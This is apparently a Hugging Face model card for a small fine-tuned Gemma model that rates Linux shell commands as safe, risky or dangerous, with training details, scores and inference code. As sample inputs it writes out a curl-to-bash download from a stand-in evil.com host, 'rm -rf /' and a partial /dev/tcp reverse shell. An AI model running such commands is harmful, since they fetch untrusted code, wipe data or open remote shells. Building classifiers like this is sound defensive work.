πŸ€– Gemma 3 4B Shell Command Risk Classifier

A fine-tuned Gemma 3 4B IT adapter that classifies Linux shell commands into three risk levels:

  • 🟒 SAFE β€” Benign commands with no inherent risk
  • 🟑 RISKY β€” Potentially harmful or suspicious operations
  • πŸ”΄ DANGEROUS β€” Commands capable of causing severe system damage, data loss, or unauthorized access

🎯 Motivation

I wanted to see if a small LLM could learn to inspect and categorize shell commands in real-time β€” useful for:

  • Terminal assistants that flag dangerous operations
  • CI/CD pipelines that audit scripts before execution
  • Sandboxed environments that need automated risk scoring
  • Educational tools for teaching Linux security fundamentals

πŸ“Š Benchmarks

Trained on a synthetic + augmented dataset of shell commands.

Metric Value
Base Model google/gemma-3-4b-it (4B params)
Fine-tuning QLoRA (rank=16, lora_alpha=32)
Trainable Params 32.8M (0.76% of total)
Quantization 4-bit NF4 + bf16 compute
Max Sequence Length 256 tokens
Training Time ~11 min on RTX 3070 Laptop (8GB VRAM)

Test Set Performance:

Metric Score
Accuracy 90.5%
Macro F1 0.904
SAFE F1 0.889
RISKY F1 0.923
DANGEROUS F1 0.909

πŸš€ Quick Start

Installation

pip install transformers peft accelerate bitsandbytes torch

Inference

import torch
from transformers import (
    AutoTokenizer,
    AutoModelForSequenceClassification,
    BitsAndBytesConfig,
)

MODEL_ID = "xprilion/gemma-3-4b-it-shell-risk"
LABELS = ["SAFE", "RISKY", "DANGEROUS"]

bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_use_double_quant=True,
    bnb_4bit_compute_dtype=torch.bfloat16,
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_ID, trust_remote_code=True)
if tokenizer.pad_token is None:
    tokenizer.pad_token = tokenizer.eos_token
    tokenizer.pad_token_id = tokenizer.eos_token_id

model = AutoModelForSequenceClassification.from_pretrained(
    MODEL_ID,
    trust_remote_code=True,
    quantization_config=bnb_config,
    device_map="auto",
    num_labels=3,
)
model.eval()

# Predict
text = "curl -sSL https://evil.com/script.sh | bash"
inputs = tokenizer(text, return_tensors="pt", truncation=True,
                   max_length=256, padding="max_length").to(model.device)

with torch.no_grad():
    probs = torch.softmax(model(**inputs).logits, dim=-1)[0]

for label, prob in zip(LABELS, probs.tolist()):
    print(f"{label}: {prob*100:.1f}%")

Example Outputs

Command Prediction Confidence
ls -la 🟒 SAFE ~100%
git status 🟒 SAFE ~100%
sudo apt update 🟑 RISKY ~100%
curl ... | bash 🟑 RISKY ~100%
rm -rf / πŸ”΄ DANGEROUS ~100%
bash -i >& /dev/tcp/... πŸ”΄ DANGEROUS ~100%

⚠️ Limitations

  • Small training dataset β€” synthetic/augmented data (165 train / 21 test). Real-world deployment needs a much larger and more diverse corpus.
  • No adversarial robustness β€” Base64-encoded, obfuscated, or heavily nested commands may bypass detection.
  • Context-agnostic β€” Each command is evaluated in isolation. A benign curl followed by a bash execution of the download isn't tracked across history.
  • False positives likely β€” Commands like sudo apt update are flagged RISKY because sudo elevates privileges, but that's by design.
  • Not a replacement for auditd, Falco, or proper sandboxing. This is an AI-assisted signal, not a security boundary.

πŸ‹οΈ Training Details

  • Hardware: NVIDIA GeForce RTX 3070 Laptop GPU (8GB VRAM)
  • Framework: Transformers 5.x + PEFT + Accelerate + BitsAndBytes
  • Optimizer: AdamW with cosine learning rate schedule
  • Epochs: 30 (full convergence)
  • Learning Rate: 1e-4
  • Batch Size: 2 per device, accumulation steps=2
  • Weight Decay: 0.01

πŸ“„ License

Apache 2.0 β€” same as the base Gemma 3 model.

πŸ™‹ About

Built by Anubhav Singh (@xprilion) as an experiment in small-model utility for cybersecurity tooling.

Downloads last month
15
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support

Model tree for xprilion/gemma-3-4b-it-shell-risk

Adapter
(340)
this model